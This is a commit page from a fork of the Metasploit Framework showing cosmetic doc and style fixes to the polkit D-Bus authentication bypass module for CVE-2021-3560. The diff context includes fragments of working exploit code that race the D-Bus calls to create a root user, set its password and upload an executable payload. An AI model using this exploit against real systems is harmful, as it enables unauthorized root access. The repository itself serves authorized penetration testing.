dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Updated docs

This commit is contained in:
Jack Heysel 2021-06-28 14:02:51 -04:00 committed by Grant Willcox
parent fdbf669da2
commit 9a07039e7e
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 16 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
documentation/modules/exploit/linux/local/polkit_dbus_auth_bypass.md
View File

@ -1,6 +1,6 @@
## Description ## Description
This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service. This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
The vulnerability enables an unprivileged local user to get a root shell on the system. The vulnerability enables an unprivileged local user to get a root shell on the system.
## Vulnerable Application ## Vulnerable Application
@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
**SESSION** **SESSION**
The session to run this module on. The session to run this module on.
**WRITABLE_DIR**
Directory to write file to (`%TEMP%` by default).
**USERNAME** **USERNAME**
The name of the user the exploit will add to the system The name of the user the exploit will add to the system
**PASSWORD** **PASSWORD**
The password for the user to be created The password for the user to be created
**WritableDir**
Directory to write file to (`%TEMP%` by default).
## Scenarios ## Scenarios
### Tested on Ubuntu 20.04 ### Tested on Ubuntu 20.04

24
modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
View File

@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
'References' => [ 'References' => [
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'], ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
['CVE', '2021-3560'], ['CVE', '2021-3560'],
['EDB', '50011'], ['EDB', '50011']
], ],
'Targets' => 'Targets' =>
[ [
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
register_options([ register_options([
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/), OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]), OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20]) OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
]) ])
register_advanced_options([ register_advanced_options([
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
if exploit_set_realname(rand_text_alphanumeric(12)) if exploit_set_realname(rand_text_alphanumeric(12))
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.') status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
unless exploit_set_realname(old_realname) unless exploit_set_realname(old_realname)
print_error('Failed to restore the root user\'s orignal \'RealName\' property value') print_error('Failed to restore the root user\'s original \'RealName\' property value')
end end
end end
end end
@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
cmd_args << object_path cmd_args << object_path
cmd_args << interface_member cmd_args << interface_member
args.each do |arg| args.each do |arg|
if arg.is_a? Integer if arg.is_a?(Integer)
cmd_args << "int32:#{arg}" cmd_args << "int32:#{arg}"
elsif arg.is_a? String elsif arg.is_a?(String)
cmd_args << "string:'#{arg}'" cmd_args << "string:'#{arg}'"
end end
end end
@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
end end
def upload(path, data) def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..." print_status("Writing '#{path}' (#{data.size} bytes) ...")
rm_f path rm_f(path)
write_file path, data write_file(path, data)
register_file_for_cleanup path register_file_for_cleanup(path)
end end
def upload_and_chmodx(path, data) def upload_and_chmodx(path, data)
upload path, data upload(path, data)
chmod path chmod(path)
end end
def upload_payload def upload_payload
@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
if exploit_set_username(loop_sequence) if exploit_set_username(loop_sequence)
uid = cmd_exec("id -u #{datastore['USERNAME']}") uid = cmd_exec("id -u #{datastore['USERNAME']}")
print_good("User #{datastore['USERNAME']} created with UID #{uid}") print_good("User #{datastore['USERNAME']} created with UID #{uid}")
print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}") print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence) if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
print_good('Obtained code execution has root!') print_good('Obtained code execution has root!')
fname = upload_payload fname = upload_payload